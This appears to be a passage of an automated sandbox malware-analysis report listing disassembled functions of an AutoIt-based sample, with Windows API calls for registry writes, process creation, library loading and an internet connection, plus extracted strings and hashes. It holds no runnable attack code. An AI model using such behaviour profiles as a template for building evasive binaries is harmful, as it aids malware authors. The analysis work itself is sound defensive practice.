                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                        • String ID:
                        • API String ID: 4175595110-0
                        • Opcode ID: 572e8cbf11af1cf1e71191c6d386544c824261860cb9bff89341099e84283753
                        • Instruction ID: 27727ebc4f876601d3730d9f69fcb9fab7c42eab1425cf7101314df92cf39213
                        • Opcode Fuzzy Hash: 572e8cbf11af1cf1e71191c6d386544c824261860cb9bff89341099e84283753
                        • Instruction Fuzzy Hash: 9771AB7290025AABDF21CFA5DC48BEEBBBCBF48310F048624F959A6190D770DE55CB60
                        APIs
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0C4BD
                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,00A1CC08,00000000,?,00000000,?,?), ref: 00A0C544
                        • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 00A0C5A4
                        • _wcslen.LIBCMT ref: 00A0C5F4
                        • _wcslen.LIBCMT ref: 00A0C66F
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 00A0C6B2
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 00A0C7C1
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 00A0C84D
                        • RegCloseKey.ADVAPI32(?), ref: 00A0C881
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0C88E
                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 00A0C960
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                        • API String ID: 9721498-966354055
                        • Opcode ID: 025418a5cfcc7d3a803b46b9637639d729ec301edcedadb7fa23d4557b2367d9
                        • Instruction ID: e45eb09071f30709efb40719b3c0a06c86315aa6f78e604033a8d5c06f7963c4
                        • Opcode Fuzzy Hash: 025418a5cfcc7d3a803b46b9637639d729ec301edcedadb7fa23d4557b2367d9
                        • Instruction Fuzzy Hash: 501267356042019FDB14EF24D881B2AB7E5FF88724F14895CF89A9B3A2DB31ED45CB91
                        APIs
                        • CharUpperBuffW.USER32(?,?), ref: 00A109C6
                        • _wcslen.LIBCMT ref: 00A10A01
                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A10A54
                        • _wcslen.LIBCMT ref: 00A10A8A
                        • _wcslen.LIBCMT ref: 00A10B06
                        • _wcslen.LIBCMT ref: 00A10B81
                          • Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD
                          • Part of subcall function 009E2BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 009E2BFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$MessageSend$BuffCharUpper
                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                        • API String ID: 1103490817-4258414348
                        • Opcode ID: 6e6abbb38cb4eab425f896cf8127245fab8576212d6906c4c7bab7bcfb232752
                        • Instruction ID: 7ce2c8fad4a5ef2bbdb1258ec2058b9431b83d8beb536cc70acc6d8849d3c769
                        • Opcode Fuzzy Hash: 6e6abbb38cb4eab425f896cf8127245fab8576212d6906c4c7bab7bcfb232752
                        • Instruction Fuzzy Hash: 82E1BB352083418FCB14EF24C450EAAB7E1BFD8358B14895CF8969B3A2DB70ED85CB91
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharUpper
                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                        • API String ID: 1256254125-909552448
                        • Opcode ID: 7257588da850fdc0878d854ea093a23d48ff2e328d66582ade7752b1f12e74c4
                        • Instruction ID: 8e052384f9a40fe6683e7cffeeb1228f9abbbf6c9115c1a3734f4dcc4bf0275d
                        • Opcode Fuzzy Hash: 7257588da850fdc0878d854ea093a23d48ff2e328d66582ade7752b1f12e74c4
                        • Instruction Fuzzy Hash: A471D53260056E8BCB10DF6CE9516BF33A6ABA17B4B650724FC559B2C4E635CD4583A0
                        APIs
                        • _wcslen.LIBCMT ref: 00A1835A
                        • _wcslen.LIBCMT ref: 00A1836E
                        • _wcslen.LIBCMT ref: 00A18391
                        • _wcslen.LIBCMT ref: 00A183B4
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A183F2
                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00A1361A,?), ref: 00A1844E
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A18487
                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A184CA
                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A18501
                        • FreeLibrary.KERNEL32(?), ref: 00A1850D
                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A1851D
                        • DestroyIcon.USER32(?), ref: 00A1852C
                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A18549
                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A18555
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                        • String ID: .dll$.exe$.icl
                        • API String ID: 799131459-1154884017
                        • Opcode ID: 1c3d55cd37a47116a5177ee320f76d25332e40c8f93a1de51f4df5681aa5f074
                        • Instruction ID: 4117eb2499faf3571e867b393947ba80a27b942f268526ab8970a0668f55abd2
                        • Opcode Fuzzy Hash: 1c3d55cd37a47116a5177ee320f76d25332e40c8f93a1de51f4df5681aa5f074
                        • Instruction Fuzzy Hash: 0B61CF71540215BAEB14DF64CC41BFE77ACFB44B21F108609F815DA1D1DFB8A991CBA0
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 0-1645009161
                        • Opcode ID: 69c94dd0481c6d781cb402281eb82a1dee4e36702279f1fdc615b371b18c70b3
                        • Instruction ID: f02aeda7d602b4401fdcb4aadeaceaede0cd87cab31cba78eaba70fee5cec0b5
                        • Opcode Fuzzy Hash: 69c94dd0481c6d781cb402281eb82a1dee4e36702279f1fdc615b371b18c70b3
                        • Instruction Fuzzy Hash: ED81F971A48605BBDB11BFA4CC42FAFB7A8BF95300F144424F805AA296EB74D951C7D1
                        APIs
                        • LoadIconW.USER32(00000063), ref: 009E5A2E
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 009E5A40
                        • SetWindowTextW.USER32(?,?), ref: 009E5A57
                        • GetDlgItem.USER32(?,000003EA), ref: 009E5A6C
                        • SetWindowTextW.USER32(00000000,?), ref: 009E5A72
                        • GetDlgItem.USER32(?,000003E9), ref: 009E5A82
                        • SetWindowTextW.USER32(00000000,?), ref: 009E5A88
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 009E5AA9
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 009E5AC3
                        • GetWindowRect.USER32(?,?), ref: 009E5ACC
                        • _wcslen.LIBCMT ref: 009E5B33
                        • SetWindowTextW.USER32(?,?), ref: 009E5B6F
                        • GetDesktopWindow.USER32 ref: 009E5B75
                        • GetWindowRect.USER32(00000000), ref: 009E5B7C
                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 009E5BD3
                        • GetClientRect.USER32(?,?), ref: 009E5BE0
                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 009E5C05
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 009E5C2F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                        • String ID:
                        • API String ID: 895679908-0
                        • Opcode ID: df6ca60e63449e9f16512e1a5675848eae6f37ce848e493ad447c8001ccb9405
                        • Instruction ID: c67c96214d949c7c6015cdd033d655eac907bfb4a2df55ff2156b530333ac2b9
                        • Opcode Fuzzy Hash: df6ca60e63449e9f16512e1a5675848eae6f37ce848e493ad447c8001ccb9405
                        • Instruction Fuzzy Hash: A3718E31900B49AFDB21DFA9CE85BAEBBF9FF48718F154918E142A25A0D774ED40CB50
                        APIs
                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009A00C6
                          • Part of subcall function 009A00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A5070C,00000FA0,68A34630,?,?,?,?,009C23B3,000000FF), ref: 009A011C
                          • Part of subcall function 009A00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,009C23B3,000000FF), ref: 009A0127
                          • Part of subcall function 009A00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,009C23B3,000000FF), ref: 009A0138
                          • Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009A014E
                          • Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009A015C
                          • Part of subcall function 009A00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009A016A
                          • Part of subcall function 009A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009A0195
                          • Part of subcall function 009A00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009A01A0
                        • ___scrt_fastfail.LIBCMT ref: 009A00E7
                          • Part of subcall function 009A00A3: __onexit.LIBCMT ref: 009A00A9
                        Strings
                        • SleepConditionVariableCS, xrefs: 009A0154
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009A0122
                        • WakeAllConditionVariable, xrefs: 009A0162
                        • InitializeConditionVariable, xrefs: 009A0148
                        • kernel32.dll, xrefs: 009A0133
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 66158676-1714406822
                        • Opcode ID: 4f0380e06ca61c6754e6edac9b445a3d41b1725f32950a7939377dbb4339376e
                        • Instruction ID: 41cdbffefcc847631c4562ec357996c57b586aa611f25b9f419cfb9032839962
                        • Opcode Fuzzy Hash: 4f0380e06ca61c6754e6edac9b445a3d41b1725f32950a7939377dbb4339376e
                        • Instruction Fuzzy Hash: D821F932A847517FE7109BE4AC16FE977A8FBC6F65F004629F801E7291DB7498018AD0
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                        • API String ID: 176396367-1603158881
                        • Opcode ID: 7aa472b0ef4eca55f71788cb9a5e6129961c9f28dc11187215ea548c16a30574
                        • Instruction ID: 22078005eecb3b474286a7dc5d655f076798ff617b736e431a89561eab68519d
                        • Opcode Fuzzy Hash: 7aa472b0ef4eca55f71788cb9a5e6129961c9f28dc11187215ea548c16a30574
                        • Instruction Fuzzy Hash: 0CE10632A00556ABCB169FB9C449BEEFBB8FF84710F54C529E456E7240EF30AE458790
                        APIs
                        • CharLowerBuffW.USER32(00000000,00000000,00A1CC08), ref: 009F4527
                        • _wcslen.LIBCMT ref: 009F453B
                        • _wcslen.LIBCMT ref: 009F4599
                        • _wcslen.LIBCMT ref: 009F45F4
                        • _wcslen.LIBCMT ref: 009F463F
                        • _wcslen.LIBCMT ref: 009F46A7
                          • Part of subcall function 0099F9F2: _wcslen.LIBCMT ref: 0099F9FD
                        • GetDriveTypeW.KERNEL32(?,00A46BF0,00000061), ref: 009F4743
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharDriveLowerType
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2055661098-1000479233
                        • Opcode ID: 8b2af43e23c6e062f65d084b39b380b4a52fd19ba01527750d252dca32364cf9
                        • Instruction ID: 409b180829917c44710f4d8bedfc609d1abff39d6c58e967b30dc192193db04f
                        • Opcode Fuzzy Hash: 8b2af43e23c6e062f65d084b39b380b4a52fd19ba01527750d252dca32364cf9
                        • Instruction Fuzzy Hash: 18B1DF316083069BC710EF28C890A7BB7E9AFE6760F50491DF696C7291E734D945CBA2
                        APIs
                        • _wcslen.LIBCMT ref: 00A0B198
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B1B0
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B1D4
                        • _wcslen.LIBCMT ref: 00A0B200
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B214
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A0B236
                        • _wcslen.LIBCMT ref: 00A0B332
                          • Part of subcall function 009F05A7: GetStdHandle.KERNEL32(000000F6), ref: 009F05C6
                        • _wcslen.LIBCMT ref: 00A0B34B
                        • _wcslen.LIBCMT ref: 00A0B366
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A0B3B6
                        • GetLastError.KERNEL32(00000000), ref: 00A0B407
                        • CloseHandle.KERNEL32(?), ref: 00A0B439
                        • CloseHandle.KERNEL32(00000000), ref: 00A0B44A
                        • CloseHandle.KERNEL32(00000000), ref: 00A0B45C
                        • CloseHandle.KERNEL32(00000000), ref: 00A0B46E
                        • CloseHandle.KERNEL32(?), ref: 00A0B4E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                        • String ID:
                        • API String ID: 2178637699-0
                        • Opcode ID: 4ce6657858d97311b7ebcb3521b422d70566bc7a33bdf635d6bb36e7d4a81743
                        • Instruction ID: 8d177aff2849a32c445e03fc5132898710a54f0871d7ed42cb926a1bf1ac2297
                        • Opcode Fuzzy Hash: 4ce6657858d97311b7ebcb3521b422d70566bc7a33bdf635d6bb36e7d4a81743
                        • Instruction Fuzzy Hash: FBF19A316183449FCB14EF24D991B6EBBE5AFC5710F18855DF8998B2A2DB31EC40CB62
                        APIs
                        • GetMenuItemCount.USER32(00A51990), ref: 009C2F8D
                        • GetMenuItemCount.USER32(00A51990), ref: 009C303D
                        • GetCursorPos.USER32(?), ref: 009C3081
                        • SetForegroundWindow.USER32(00000000), ref: 009C308A
                        • TrackPopupMenuEx.USER32(00A51990,00000000,?,00000000,00000000,00000000), ref: 009C309D
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 009C30A9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                        • String ID: 0
                        • API String ID: 36266755-4108050209
                        • Opcode ID: a5a92d7d07ca1b4312323f3a6e51f94557e9c3f16375a5baf463f081bdd996fd
                        • Instruction ID: 6161d4370985228b5561f781d922e3dcfeebe8365610b9675e4eab19a272cfbe
                        • Opcode Fuzzy Hash: a5a92d7d07ca1b4312323f3a6e51f94557e9c3f16375a5baf463f081bdd996fd
                        • Instruction Fuzzy Hash: F0714D31A44205BEEB21DF69CC49FAABF69FF05774F20821AF5246A1D0C7B5AD10C791
                        APIs
                        • DestroyWindow.USER32(?,?), ref: 00A16DEB
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A16E5F
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A16E81
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A16E94
                        • DestroyWindow.USER32(?), ref: 00A16EB5
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00980000,00000000), ref: 00A16EE4
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A16EFD
                        • GetDesktopWindow.USER32 ref: 00A16F16
                        • GetWindowRect.USER32(00000000), ref: 00A16F1D
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A16F35
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A16F4D
                          • Part of subcall function 00999944: GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                        • String ID: 0$tooltips_class32
                        • API String ID: 2429346358-3619404913
                        • Opcode ID: 77b03485e28f0dec36bce38de1bb935b2eaaed355189c874dbf696518ef460e4
                        • Instruction ID: e534ec83fb99963026870509a5ccf30b2a109850392f5f01cf96a86131442da1
                        • Opcode Fuzzy Hash: 77b03485e28f0dec36bce38de1bb935b2eaaed355189c874dbf696518ef460e4
                        • Instruction Fuzzy Hash: 34716674244340AFDB21CF68D848BBABBE9FB88314F04491DF999C72A1C774A946CB11
                        APIs
                          • Part of subcall function 00999BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00999BB2
                        • DragQueryPoint.SHELL32(?,?), ref: 00A19147
                          • Part of subcall function 00A17674: ClientToScreen.USER32(?,?), ref: 00A1769A
                          • Part of subcall function 00A17674: GetWindowRect.USER32(?,?), ref: 00A17710
                          • Part of subcall function 00A17674: PtInRect.USER32(?,?,00A18B89), ref: 00A17720
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A191B0
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A191BB
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A191DE
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A19225
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00A1923E
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A19255
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00A19277
                        • DragFinish.SHELL32(?), ref: 00A1927E
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A19371
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                        • API String ID: 221274066-3440237614
                        • Opcode ID: 5b35d1d6f7066a145b5a70c5bb20d2d85e020557280c5ce99d2121e60f87c986
                        • Instruction ID: 9656e9119cb0efa76f4c340de36e0f45c807c2fa86e24849d55f6a9ce77f1f65
                        • Opcode Fuzzy Hash: 5b35d1d6f7066a145b5a70c5bb20d2d85e020557280c5ce99d2121e60f87c986
                        • Instruction Fuzzy Hash: 52614A71108301AFD701EFA4DC85EAFBBE9EFC9750F04492DF5A5962A0DB309A49CB52
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009FC4B0
